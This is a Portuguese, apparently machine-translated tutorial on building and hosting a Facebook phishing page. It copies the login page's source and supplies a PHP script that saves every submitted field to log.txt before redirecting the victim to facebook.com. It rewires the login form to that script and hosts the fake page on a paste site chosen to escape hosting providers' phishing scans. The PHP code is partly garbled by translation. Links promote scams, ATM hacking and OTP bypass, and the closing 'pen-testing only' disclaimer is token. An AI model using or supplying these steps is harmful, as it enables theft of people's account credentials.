Tabela de Conteúdo
Como criar um Facebook link de phishing
Recentemente me deparei com muitos guias sobre como criar páginas de phishing. Embora os princípios por trás de cada guia é semelhante, a maioria das soluções de hospedagem no guia não funciona mais devido a um aumento na repressão de páginas de phishing por empresas de hospedagem. Neste guia, passarei por todas as etapas necessárias para criar e hospedar uma página de phishing de sua escolha. Aproveite!
baixe o índice HTML da Página de destino
para começar, você precisa obter o índice HTML da página. Existem vários métodos para fazer isso, existem até modelos online para sites populares. Neste tutorial, vou usar a maneira mais básica para ser o mais amigável possível.
Leia também: como criar um site de phishing usando o kali linux
Navegar na Sua Página web
neste tutorial, eu estou indo para phish Facebook.
veja a fonte da página da Web.
dependendo do seu navegador, pode haver métodos diferentes. Normalmente é feito clicando com o botão direito do mouse no site e clicando em “Ver fonte”. Eu fiz isso no meu navegador e um windows deve sair semelhante a este:
na caixa à direita está a fonte do site. O que leva à próxima etapa:
baixando e salvando o código-fonte
selecione a caixa e copie e cole tudo na caixa em um documento txt. Use o bloco de notas no windows e um programa simples de edição de texto se você não estiver usando o windows. (Não use programas como Word ou Pages porque é muito lento). Depois de fazer isso, clique em “Salvar como” ou qualquer opção que permita salvar esse documento. No bloco de notas, deve ser assim:
alterar “Salvar como tipo” para todos os arquivos e alterar a codificação para Unicode.
depois disso, nomeie o documento “índice.html”, obviamente sem as marcas de fala.
Parabéns! Você terminou o primeiro passo do tutorial!
Leia também: Como fazer Facebook golpe sem foi banido ou ficar bloqueado
LIÇÃO 2
Criar um Arquivo PHP para Colheita Senha
O arquivo PHP é, basicamente, a ferramenta que colhe a palavra-passe de utilizadores neste cenário. Existem várias maneiras de criar este PHP se você tiver algum conhecimento de programação, mas se não tiver, basta copiar meu exemplo PHP.
<?php
cabeçalho (‘localização: facebook.com’);
$handle = fopen (“log.txt”, “a”);
foreach($_POST as $variável => $valor) {
fwrite($handle, variável $);
fwrite($handle, “=”);
fwrite($handle, $valor);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n\n\n\n”);
fclose($handle);
saída;
?>
o mesmo que acima, salve o arquivo PHP como” todos os arquivos “e como” post.pai”. Mude a codificação para Unicode e você deve estar pronto para ir!
modifique o arquivo HTML da página para incorporar seu arquivo PHP nele.
agora, precisamos incorporar nosso arquivo PHP, para receber senhas que os usuários enviam.
Encontre o método de envio de senha
primeiro, você precisa ver como o site Lida quando o usuário envia uma senha de nome de usuário.
para o Facebook, tudo o que você precisa fazer é Ctrl-F e digitar “=ação” no campo.
Agora, você precisa substituir tudo na parte sublinhada por ” post.php”, mantenha as marcas de fala. (apenas um conjunto, por favor).
obviamente, este método será diferente para outros sites. Um bom método para encontrá-lo é usando a ferramenta Inspect Elements na maioria dos navegadores modernos e clicando no botão login. Encontre algo semelhante ao método acima.
Leia também: Aprenda a hackear cartões ATM, máquinas usando o software Wizcardo
observe: você precisará alterar isso mais tarde quando realmente hospedar o site.
Hospedando O arquivo PHP para armazenamento de senha
agora aqui está a parte suculenta, tornando seu site falso online para que outras pessoas possam navegar nele.
você pode usar qualquer serviço de hospedagem gratuito para hospedar e armazenar senhas. No entanto, o plano de hospedagem deve incluir algo chamado “FTP”. Para este tutorial, estarei usando 000webhost.
navegue até o servidor FTP para o seu serviço de hospedagem na web
para esta etapa, presumo que você já tenha criado um site com o seu serviço de hospedagem.
para 000webhost, basta clicar em” Gerenciador de arquivos “e clicar em”Carregar arquivos”. Aqui está uma imagem do servidor FTP para 000webhost:
Ignore os outros arquivos, esses são apenas algumas das minhas coisas pessoais, não relacionadas a este tutorial.
carregue seus arquivos PHP e altere a permissão
como você pode ver, já carreguei meu arquivo PHP. Mas você precisa apenas enviá-lo para a pasta principal do seu servidor FTP. (Alguns servidores FTP não permitem que você carregue para a pasta raiz, basta seguir suas instruções específicas).
Agora você precisa alterar a permissão para “777”, que é basicamente todas as permissões. Quando solicitado a marcar caixas para as permissões, basta marcar cada uma.
agora você pode fechar o servidor FTP. Anote seu endereço da web!
Leia também: instruções passo a passo para ignorar a verificação OTP em qualquer site
hospedando a Página de Phishing real
para esta etapa, você precisará usar o provedor de hospedagem exato que eu uso, caso contrário, você será banido.
há uma razão pela qual eu não uso o mesmo provedor de hospedagem para minha página real, e isso ocorre porque a maioria dos provedores de hospedagem empregará algum tipo de varredura para detectar páginas de phishing. Eu posso tentar vários serviços de hospedagem no passado e todos eles me baniram dentro de 30 minutos após o upload do arquivo de índice.
configurando o post.php Forum
agora, antes de hospedar o site, lembre-se do post.php / login forma coisa que configuramos acima?
você precisa encontrar a coisa do formulário de login novamente em seu índice.html e substituir o ” post.php ” com ” http://yourwebsiteforyourpostphpupload/post.php”, assumindo que Você enviou para a pasta raiz. Lembre-se de adicionar http: / / na frente do site. Para testar isso, navegue até o site (http://yourwebsiteforyourpostphpupload/post.php) e veja se ele redireciona você para o Facebook.com, se isso acontecer, você colou o site correto. Caso contrário, verifique se você enviou seu arquivo para o diretório correto.
Hospedagem de Página Real
Navegue para htmlpasta.com. Você verá algo semelhante a este:
em Seguida, você precisa copiar o índice.arquivo html para o seu site de phishing e cole-o aqui.
agora, clique no re e clique em Colar, você receberá um link para o seu site.
Conclusão
Parabéns! Você terminou de hospedar seu primeiro site de phishing! Navegue até o seu site e tente inserir alguns detalhes de login falsos, depois de clicar no botão login, ele deve redirecioná-lo para facebook.com. faça Login no seu servidor FTP que você hospedou sua postagem.arquivo php, e deve haver um novo documento chamado Log.txt que é armazenado na mesma pasta que sua postagem.arquivo php. Quaisquer detalhes de login devem ser armazenados lá.
Leia também: 2020 yahoo yahoo yahoo formato, formato de faturamento, download em pdf
por favor, não use isso para fins maliciosos, use apenas para testes de penetração e com autorização de sua vítima.
